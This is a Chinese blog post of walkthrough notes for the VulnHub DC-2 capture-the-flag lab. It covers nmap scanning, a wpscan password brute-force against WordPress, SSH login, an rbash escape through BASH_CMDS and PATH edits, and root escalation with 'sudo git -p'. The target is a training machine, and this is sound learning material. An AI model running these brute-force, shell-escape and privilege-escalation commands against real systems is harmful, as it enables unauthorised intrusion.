vulnhub-DC2笔记

发布于 2022-01-05  1945 次阅读


1.nmap -sP 192.168.0.100/24确认靶机ip
2.nmap -A -p 1-65535 192.168.0.100 发现开放80/7744
3.直接访问发现失败,手动设置/etc/hosts添加一条解析192.168.0.100 DC-2即可正常访问
windows下C:\Windows\System32\drivers\etc\hosts
4.访问发现flag1,并提示:我们这儿提示我们要使用cewl,这是一个爬取url生成字典文件的工具
5.dirb 192.168.0.131爬取下看看
6.发现wp-admin登录页面是一个wordpress框架(也可whatwebhttps://zhuanlan.zhihu.com/p/396345123看一下)
7.cewl http://dc-2 -w dict.txt 根据提示用cewl生成字典
8.wpscan --url http://dc-2 --enumerate u 使用wpscan进行枚举用户名获得admin/jerry/tom三个可能的用户名
9.wpscan --url http://dc-2 --usernames 'admin,jerry,tom' --passwords dict.txt配和之前生成的字典进行爆破,获得
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient 两组可能的
10.登录成功后发现没有什么能利用的,去用ssh, ssh tom@192.168.0.131 -p 7744
11.第一个用户名ssh失败利用第二个,登录成功,ls,发现查看命令只有less能用
12.less flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
告诉我们要切换用户到jerry,不过在此之前要逃逸rbash,参考https://xz.aliyun.com/t/7642
https://www.cnblogs.com/xiaoxiaoleo/p/8450379.html
13.BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /* 成功逃逸
14.su jerry切换用户cd到家目录下发现flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
15.shdo -l 查看当前权限;#查看可以使用root权限无密码的命令,有git命令
提示我们可以使用root的git命令,我们利用git提权
16.sudo git -p       (或者sudo git help status )!/bin/bash提权
17提权成功whoami 发现是root,cd|ls发现final-flag.txt

__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.

收获:
1.kali-whatweb工具使用
2.dns配置文件
3.kali-cewl工具的使用
4.kali-wpscan工具的使用
5.rbash逃逸
https://xz.aliyun.com/t/7642
https://www.cnblogs.com/xiaoxiaoleo/p/8450379.html
vulnhub DC-2 - the5t4r - 博客园 (cnblogs.com)
vulnhub渗透实战-DC2 - Wuzhiyu - 博客园 (cnblogs.com)
Vulnhub靶机实战——DC-2_冠霖L的博客-CSDN博客_vulnhub靶机实战
6.git提权
7.sudo -l  #查看可以使用root权限无密码的命令

子夜不哭
最后更新于 2022-01-05